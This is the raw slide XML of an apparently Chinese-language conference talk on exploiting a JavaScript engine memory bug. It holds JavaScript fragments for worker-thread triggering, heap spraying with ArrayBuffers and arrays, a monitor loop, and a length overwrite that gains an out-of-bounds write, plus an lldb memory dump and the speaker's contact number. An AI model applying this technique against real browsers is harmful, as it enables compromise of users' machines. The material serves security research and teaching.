              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>。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599774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89888" y="1975104"/>
            <a:ext cx="8614724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姓名：李克萌</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="3200" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3200" dirty="0"/>
              <a:t>微</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3200" dirty="0" smtClean="0"/>
              <a:t>信</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3200" dirty="0" smtClean="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3200" dirty="0" err="1" smtClean="0"/>
              <a:t>qq</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3200" dirty="0" smtClean="0"/>
              <a:t>：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3200" dirty="0" smtClean="0"/>
              <a:t>672639236</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3200" dirty="0" smtClean="0"/>
              <a:t>研究方向</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="3200" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3200" dirty="0" smtClean="0"/>
              <a:t>漏洞挖掘利用</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="3200" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3200" dirty="0"/>
              <a:t>区</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3200" dirty="0" smtClean="0"/>
              <a:t>块链安全</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="3200" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3200" dirty="0" smtClean="0"/>
              <a:t>源码审计</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3200" dirty="0" smtClean="0"/>
              <a:t>        </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3600" dirty="0" smtClean="0"/>
              <a:t>	</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3200" dirty="0"/>
              <a:t>墨云</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3200" dirty="0" smtClean="0"/>
              <a:t>科技</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3200" dirty="0" smtClean="0"/>
              <a:t>黑客机器人（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3200" dirty="0" err="1" smtClean="0"/>
              <a:t>vackbot</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3200" dirty="0" smtClean="0"/>
              <a:t>）</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3200" dirty="0" smtClean="0"/>
              <a:t>7</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3200" dirty="0" smtClean="0"/>
              <a:t>*</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3200" dirty="0" smtClean="0"/>
              <a:t>24</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3200" dirty="0" smtClean="0"/>
              <a:t>小时自动化安全攻击测试</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="3200" dirty="0" smtClean="0"/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779520" y="865632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/>
              <a:t>自我介绍</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="60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982" y="498919"/>
            <a:ext cx="1914525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64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8448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2 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>创建新线程，在新线程中触发漏洞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55700" y="1344706"/>
            <a:ext cx="7117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创建新线程，主线程加入监控代码</a:t>
            </a:r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1155700" y="2034988"/>
            <a:ext cx="57829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/>
              <a:t>var worker1 = new Worker("worker1.js");</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="流程图: 可选过程 7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="126219" y="4827649"/>
            <a:ext cx="1290205" cy="715089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1416424" y="4808392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流程图: 可选过程 11"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2841812" y="4808392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Dst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132017" y="4827649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4" name="流程图: 可选过程 13"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5557405" y="4846906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</a:rPr>
              <a:t>S</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>src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r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>rc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6847610" y="484690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8272998" y="484690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Arraybuffer-m_data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9698386" y="484690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1043091" y="4846905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en-US" altLang="zh-CN" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="FFFF00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010728" y="3415774"/>
            <a:ext cx="71471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/>
              <a:t>Freed</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>的堆块会被占用，并触发越界写</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="19" name="矩形 18"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1173630" y="2503773"/>
            <a:ext cx="29175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 err="1"/>
              <a:t>setInterval</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>("test()",1);</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="20" name="文本框 19"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7327222" y="1437167"/>
            <a:ext cx="4500784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/>
              <a:t>f</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" smtClean="0"/>
              <a:t>unction test</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>（）</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" smtClean="0"/>
              <a:t>{</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>if(array1[0x157][0]!=0x21212121</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" smtClean="0"/>
              <a:t>){</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" smtClean="0"/>
              <a:t>       exploit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>（）</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" smtClean="0"/>
              <a:t>;</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" smtClean="0"/>
              <a:t>}</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" smtClean="0"/>
              <a:t>}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67386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57631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2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>创建新线程，在新线程中触发漏洞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7" name="流程图: 可选过程 6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="386195" y="1905156"/>
            <a:ext cx="1290205" cy="715089"/>
          </a:xfrm>
          <a:prstGeom prst="flowChartAlternateProcess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676400" y="1885899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3101788" y="1885899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Dst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391993" y="190515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流程图: 可选过程 12"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5817381" y="1924413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</a:rPr>
              <a:t>S</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>src</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>r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algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>c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7107586" y="192441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8532974" y="192441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9958362" y="192441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11303067" y="1924412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43175" y="1196366"/>
            <a:ext cx="72905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在</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0" smtClean="0"/>
              <a:t>work</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>线程，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0" err="1" smtClean="0"/>
              <a:t>memcpy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0" err="1" smtClean="0"/>
              <a:t>dst</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0" err="1" smtClean="0"/>
              <a:t>src</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0" smtClean="0"/>
              <a:t>size</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>）</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="18" name="曲线连接符 17"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="13" idx="2"/>
            <a:endCxn id="11" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="5400000" flipH="1">
            <a:off x="5085431" y="1262449"/>
            <a:ext cx="38514" cy="2715593"/>
          </a:xfrm>
          <a:prstGeom prst="curvedConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val -59355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曲线连接符 25"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="14" idx="2"/>
            <a:endCxn id="12" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="5400000" flipH="1">
            <a:off x="6452855" y="1272078"/>
            <a:ext cx="19257" cy="2715593"/>
          </a:xfrm>
          <a:prstGeom prst="curvedConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val -118710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曲线连接符 29"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="5400000" flipH="1">
            <a:off x="9446813" y="1118843"/>
            <a:ext cx="19257" cy="2715593"/>
          </a:xfrm>
          <a:prstGeom prst="curvedConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val -477168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719084" y="4409746"/>
            <a:ext cx="47654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/>
              <a:t>在主线程中，开始执行</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0" smtClean="0"/>
              <a:t>exploit</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="32" name="曲线连接符 31"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="5400000" flipH="1">
            <a:off x="8022367" y="1099586"/>
            <a:ext cx="19257" cy="2715593"/>
          </a:xfrm>
          <a:prstGeom prst="curvedConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val -477168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300060996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6158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01.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>修改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jsArray</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>length</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>获得越界写能力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7" name="流程图: 可选过程 6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="709051" y="4306369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Dst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999256" y="4325626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1" name="流程图: 可选过程 10"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3424644" y="4344883"/>
            <a:ext cx="1290205" cy="715089"/>
          </a:xfrm>
          <a:prstGeom prst="flowChartAlternateProcess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0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>S</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>src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r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>rc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714849" y="434488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Dstarray</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="FFFF00"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p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6140237" y="434488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m_data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7565625" y="4344883"/>
            <a:ext cx="1425388" cy="715089"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect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Arraybuffer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>-&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>mdata</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFFF00"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="15" name="曲线连接符 14"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="11" idx="2"/>
            <a:endCxn id="7" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="5400000" flipH="1">
            <a:off x="2692694" y="3682919"/>
            <a:ext cx="38514" cy="2715593"/>
          </a:xfrm>
          <a:prstGeom prst="curvedConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val -593550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线连接符 15"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="12" idx="2"/>
            <a:endCxn id="8" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="5400000" flipH="1">
            <a:off x="4060118" y="3692548"/>
            <a:ext cx="19257" cy="2715593"/>
          </a:xfrm>
          <a:prstGeom prst="curvedConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val -1187101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/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="5400000" flipH="1">
            <a:off x="7054076" y="3548942"/>
            <a:ext cx="19257" cy="2715593"/>
          </a:xfrm>
          <a:prstGeom prst="curvedConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val -477168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/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="5400000" flipH="1">
            <a:off x="5629630" y="3520056"/>
            <a:ext cx="19257" cy="2715593"/>
          </a:xfrm>
          <a:prstGeom prst="curvedConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val -4771683"/>
            </a:avLst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274721" y="1156294"/>
            <a:ext cx="5804581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err="1" smtClean="0"/>
              <a:t>dstarray</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0" smtClean="0"/>
              <a:t>=new </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0"/>
              <a:t>Array(0x20000-0x40);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0" err="1" smtClean="0"/>
              <a:t>dst</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0" err="1"/>
              <a:t>a</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0" err="1" smtClean="0"/>
              <a:t>rray</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0" smtClean="0"/>
              <a:t>[0</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0"/>
              <a:t>]=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0" err="1"/>
              <a:t>i</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0"/>
              <a:t>;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0" err="1" smtClean="0"/>
              <a:t>dstarray</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0" smtClean="0"/>
              <a:t>[1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0"/>
              <a:t>]=0x212121;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0"/>
              <a:t>    for(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0" err="1"/>
              <a:t>var</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0"/>
              <a:t> j=2;j&lt;0x20000-0x40;j++){</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0"/>
              <a:t>        </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0" err="1" smtClean="0"/>
              <a:t>dstarray</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0" smtClean="0"/>
              <a:t>[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0" err="1" smtClean="0"/>
              <a:t>i</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0"/>
              <a:t>]=0x21;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0"/>
              <a:t>    }</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="矩形 3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5705908" y="670560"/>
            <a:ext cx="6096000" cy="35394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800" dirty="0"/>
              <a:t> var buffer=new ArrayBuffer(0x100000-0x40);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0" err="1" smtClean="0"/>
              <a:t>srca</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>rray</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0"/>
              <a:t>=new Uint32Array(buffer);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0" err="1" smtClean="0"/>
              <a:t>src</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0" err="1"/>
              <a:t>a</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>rray</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0"/>
              <a:t>[0]=0x21212121;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0" err="1" smtClean="0"/>
              <a:t>srca</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>rray</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0"/>
              <a:t>[1]=i;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0"/>
              <a:t>    for(var j=0x10;j&lt;0x20;j++){</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0"/>
              <a:t>        </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0" err="1" smtClean="0"/>
              <a:t>srca</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>rray</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0"/>
              <a:t>[j]=0x41414141;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0"/>
              <a:t>    }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65308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46734" y="409575"/>
            <a:ext cx="67780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修改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jsArray</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>length</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>获得越界写入能力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3081" y="1276865"/>
            <a:ext cx="1147530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zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(lldb) x -f p -c 40 0x0000000139900000</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>0x139900000: 0x000000011e70c000 0x000000011e427000 0x00000000000ffe10 0x0000000100010100</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>0x139900020: 0x000000011e4005a8 0x0000000000000000 0x0000000000000000 0x0000000000000000</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>0x139900040: 0x0000000000000000 0x0000000000000000 0x0000000000000000 0x000000011e400000</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>0x139900060: 0x0000000139900001 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>0x0001ffc00001ffc0</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t> 0xffff000000000155 0xffff000000212121</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
